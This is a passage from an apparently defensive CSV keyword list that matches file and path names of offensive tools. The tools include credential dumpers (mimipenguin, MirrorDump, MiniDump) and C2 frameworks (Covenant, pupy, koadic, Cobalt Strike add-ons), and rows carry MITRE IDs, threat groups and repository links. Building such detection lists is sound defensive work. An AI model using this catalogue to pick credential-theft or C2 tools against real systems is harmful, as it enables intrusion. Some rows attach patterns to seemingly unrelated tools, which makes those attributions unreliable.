T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - 
Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","8843" "*/mimipenguin.md*",".{0,1000}\/mimipenguin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8844" "*/mimipenguin.sh*",".{0,1000}\/mimipenguin\.sh.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","1","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","8845" 
"*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","8846" "*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","8847" "*/mimipenguin/releases/download/*",".{0,1000}\/mimipenguin\/releases\/download\/.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","1","#linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","8848" "*/mimipy.git*",".{0,1000}\/mimipy\.git.{0,1000}","offensive_tool_keyword","mimipy","Tool to dump passwords from various processes memory","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/n1nj4sec/mimipy","1","1","N/A","N/A","10","3","207","36","2017-04-30T00:09:15Z","2017-04-05T21:06:32Z","8849" "*/mimipy.py*",".{0,1000}\/mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8850" "*/mimishim/*",".{0,1000}\/mimishim\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8851" "*/MiniDump.git*",".{0,1000}\/MiniDump\.git.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","8852" "*/minidump.go*",".{0,1000}\/minidump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","8853" "*/minidump.zip*",".{0,1000}\/minidump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense 
Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8854" "*/MiniDump-main.zip*",".{0,1000}\/MiniDump\-main\.zip.{0,1000}","offensive_tool_keyword","MiniDump","C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/cube0x0/MiniDump","1","1","N/A","N/A","10","3","291","48","2021-10-13T18:00:46Z","2021-08-14T12:26:16Z","8855" "*/minidump-rs.exe*",".{0,1000}\/minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8856" "*/minimal_elf.h*",".{0,1000}\/minimal_elf\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","8857" "*/Minimalistic-offensive-security-tools.git*",".{0,1000}\/Minimalistic\-offensive\-security\-tools\.git.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - 
TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","1","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","8858" "*/mirai_pass.txt*",".{0,1000}\/mirai_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8859" "*/MirrorDump.exe*",".{0,1000}\/MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8860" 
"*/MirrorDump.git*",".{0,1000}\/MirrorDump\.git.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","8861" "*/Misc/donut.exe*",".{0,1000}\/Misc\/donut\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","1","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","8862" "*/MiTM.java*",".{0,1000}\/MiTM\.java.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","8863" "*/mitmAP*",".{0,1000}\/mitmAP.{0,1000}","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","10","1668","265","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z","8864" "*/MITMRecorder.py*",".{0,1000}\/MITMRecorder\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","#linux","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","8866" "*/mkzoneslices.sh*",".{0,1000}\/mkzoneslices\.sh.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","1","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","8868" "*/mmouse-brute.nse*",".{0,1000}\/mmouse\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8869" "*/mmouse-exec.nse*",".{0,1000}\/mmouse\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8870" "*/mobaxterm.py*",".{0,1000}\/mobaxterm\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8871" "*/mobaxterm.rb*",".{0,1000}\/mobaxterm\.rb.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#linux","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","8872" "*/Mockingjay_BOF.git*",".{0,1000}\/Mockingjay_BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection 
Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","N/A","9","10","151","18","2023-11-07T19:04:03Z","2023-08-27T06:01:28Z","8873" "*/modbus-discover.nse*",".{0,1000}\/modbus\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8874" "*/Models/PowerShellLauncher.*",".{0,1000}\/Models\/PowerShellLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","8875" 
"*/Models/Regsvr32Launcher.*",".{0,1000}\/Models\/Regsvr32Launcher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","8876" "*/Models/ShellCodeLauncher.*",".{0,1000}\/Models\/ShellCodeLauncher\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","8877" "*/Modlishka.git*",".{0,1000}\/Modlishka\.git.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","8878" "*/module/darkexe/*",".{0,1000}\/module\/darkexe\/.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","8879" "*/Modules/Exitservice/uinit.exe*",".{0,1000}\/Modules\/Exitservice\/uinit\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","8880" "*/modules/kull_m_crypto_system.h*",".{0,1000}\/modules\/kull_m_crypto_system\.h.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","#linux","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","8881" 
"*/modules/payload/*",".{0,1000}\/modules\/payload\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8882" "*/modules/windows/shinject/*",".{0,1000}\/modules\/windows\/shinject\/.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","8883" "*/momyshark.html*",".{0,1000}\/momyshark\.html.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - 
T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","8884" "*/momyshark?key=*",".{0,1000}\/momyshark\?key\=.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","8885" "*/momyshark?key=*",".{0,1000}\/momyshark\?key\=.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 